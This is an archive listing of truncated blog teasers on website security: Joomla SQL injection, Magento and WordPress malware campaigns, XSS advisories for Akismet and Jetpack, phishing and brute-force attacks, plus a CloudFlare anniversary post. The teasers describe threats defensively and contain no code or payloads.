The Joomla team just released a new Joomla version (3.4.5) to fix some serious security vulnerabilities. The most critical one is a remote and unauthenticated SQL injection on the com_contenthistory module (included by default) that allows for a full take over of the vulnerable site. Directly from the Joomla announcement: Joomla! 3.4.5 is now available.Read […]
Archive | Security
RSS feed for this sectionMassive Magento Guruincsite Infection
We are currently seeing a massive attack on Magento sites where hackers inject malicious scripts that create iframes from “guruincsite[.]com“. Google already blacklisted about seven thousand sites because of this malware. There are two modifications of it. The first script is in not obfuscated: Simple guruincsite script and the second one is obfuscated Obfuscated guruincsite script The obfuscatedRead […]
Security Advisory: Stored XSS in Akismet WordPress Plugin
Security Risk: Dangerous Exploitation Level: Easy/Remote DREAD Score: 9/10 Vulnerability: Stored XSS Patched Version: 3.1.5 During a routine audit for our WAF, we discovered a critical stored XSS vulnerability affecting Akismet, a popular WordPress plugin deployed by millions of installs. Vulnerability Disclosure Timeline: October 2nd, 2015 – Bug discovered, initial report to Automattic security team October 5th, 2015Read […]
Redirect to Microsoft Word Macro Virus
These days we rarely see Microsoft Word malware on websites, but it still exists and compromised websites can distribute this kind of malware as well. It’s not just email attachments when it comes to sharing infected documents. For example, this malicious file was found on a hacked Joomla site by our analyst Krasimir Konov. This scriptRead […]
Brute Force Amplification Attacks Against WordPress XMLRPC
Brute Force attacks are one of the oldest and most common types of attacks that we still see on the Internet today. If you have a server online, it’s most likely being hit right now. It could be via protocols like SSH or FTP, and if it’s a web server, via web-based brute force attempts againstRead […]
Phishing for Anonymous Alligators
Everyone has encountered phishing at some point – fake emails and web pages designed to look legitimate. This tactic is becoming more popular as attackers are learning how to produce new and convincing phishing lures. You might receive spam emails claiming to have some important document for you. Some of them have malicious attachments andRead […]
Security advisory: Stored XSS in Jetpack
Security Risk: Dangerous Exploitation Level: Easy/Remote DREAD Score: 8/10 Vulnerability: Stored XSS Patched Version: 3.7.1 During a routine audit for our WAF, we discovered a critical stored XSS affecting the Jetpack WordPress plugin, one of the most popular plugin of the WordPress ecosystem. Vulnerability Disclosure Timeline: September 10th, 2015 – Initial report to Automattic security teamRead […]
WordPress Malware – VisitorTracker Campaign Update
For the last 3 weeks we have been tracking a malware campaign that has been compromising thousands of WordPress sites with the VisitorTracker malware code. We initially posted some details about this issue on this blog post: WordPress Malware – Active VisitorTracker Campaign, but as the campaign and the malicious code has evolved, we decided provideRead […]
Analyzing Black Hat URL Shorteners
Hackers are known to use URL shortening services to obfuscate their real landing pages. It’s very effective in clickbait scams on social networks. Some hackers think that using URL shorteners in site injections makes it less likely to be flagged as malicious because authorities cannot simply blacklist a link from bitly.com or goo.gl, so weRead […]
Happy 5th Birthday, CloudFlare!
CloudFlare customers recorded videos to celebrate our first five years Today is September 27, 2015. It’s a rare Super Blood Moon. And it’s also CloudFlare’s birthday. CloudFlare launched 5 years ago today. It was a Monday. While Michelle, Lee, and I had high expectations, we would never have imagined what’s happened since then. In the […]
